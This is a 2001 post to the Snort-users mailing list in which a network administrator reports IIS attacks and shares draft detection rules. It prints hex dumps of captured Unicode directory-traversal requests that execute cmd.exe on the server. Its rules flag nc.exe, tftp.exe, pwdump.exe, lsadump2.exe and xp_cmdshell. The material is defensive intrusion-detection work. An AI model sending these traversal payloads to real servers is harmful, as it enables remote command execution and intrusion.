[Snort-users] The NT testing begins...

Jim Forster jforster at ...176...
Tue Mar 13 18:10:02 EST 2001


It appears the 'testing' for those IIS issues has begun...  Just got hit
with these, starting today...

The 'test' rules I'm messing with follow these - most are based on the
"Running Snort on IIS Web Servers Part 2" paper by Mark Burnett. - Some very
good ideas in there! :)
(It is a mix of known files the server will have, and more generic filenames
which are only valid if the attacker didn't change the executable name.)

Anyone else getting these starting today, or am I just the 'lucky one' so
far?  :P

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 30 25 61 66 2E 2E 2F 2E 2E 25 63 30 25 61 66   c0%af../..%c0%af
020 : 2E 2E 2F 2E 2E 25 63 30 25 61 66 2E 2E 2F 77 69   ../..%c0%af../wi
030 : 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64   nnt/system32/cmd
040 : 2E 65 78 65 3F 2F 63 2B 64 69 72 2B 63 3A 5C 20   .exe?/c+dir+c:\
050 : 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A               HTTP/1.0....

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 66 69 6C   GET /scripts/fil
010 : 65 2E 62 61 74 2F 2E 2E 25 43 31 25 39 43 2E 2E   e.bat/..%C1%9C..
020 : 25 43 31 25 39 43 2E 2E 25 43 31 25 39 43 77 69   %C1%9C..%C1%9Cwi
030 : 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64   nnt/system32/cmd
040 : 2E 65 78 65 3F 2F 63 25 32 30 64 69 72 2B 20 48   .exe?/c%20dir+ H
050 : 54 54 50 2F 31 2E 30 0A 0A                        TTP/1.0..

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 66 69 6C   GET /scripts/fil
010 : 65 2E 62 61 74 2F 2E 2E C1 9C 2E 2E C1 9C 2E 2E   e.bat/..........
020 : C1 9C 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32   ..winnt/system32
030 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 20 64 69 72 2B   /cmd.exe?/c dir+
040 : 20 48 54 54 50 2F 31 2E 30 0A 0A                   HTTP/1.0..


New 'beta' rules you can toss in local.rules if you'd like to help test 'em
out....
----------------------------------------------------------------------------
--
alert tcp $HOME_NET 80 -> $EXTERNAL_NET any (msg:"Outgoing dir list";
content:"Directory Listing of"; nocase;)
alert tcp $HOME_NET 80 -> $EXTERNAL_NET any (msg:"Outgoing file ok";
content:"1 file(s) copied"; nocase;)
alert tcp $HOME_NET 80 -> $EXTERNAL_NET any (msg:"Outgoing Cmd completed";
content:"Command completed"; nocase;)
alert tcp $HOME_NET 80 -> $EXTERNAL_NET any (msg:"Outgoing error";
content:"Bad command or filename"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS global-asa
access";flags: A+; content:"global.asa"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-MISC Attempt to
execute cmd"; flags: A+; content:"cmd.exe"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS ftp
attempt";flags: A+; content:"ftp.exe"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS tftp
attempt";flags: A+; content:"tftp.exe"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS net
attempt";flags: A+; content:"net.exe"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS telnet
attempt";flags: A+; content:"telnet.exe"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS rcmd
attempt";flags: A+; content:"rcmd.exe"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS wsh
attempt";flags: A+; content:"wsh.exe"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS csh
attempt";flags: A+; content:"csh.exe"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS perl
attempt";flags: A+; content:"perl.exe"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS nc
attempt";flags: A+; content:"nc.exe"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS lsadump2
attempt";flags: A+; content:"lsadump2.exe"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS pwdump
attempt";flags: A+; content:"pwdump.exe"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS cmdshell
attempt";flags: A+; content:"xp_cmdshell"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS availablemedia
attempt";flags: A+; content:"xp_availablemedia"; nocase;)

Jim Forster
Network Administrator
RapidNet / DakotaConnect
--------------------------------------------
http://www.snort.org





More information about the Snort-users mailing list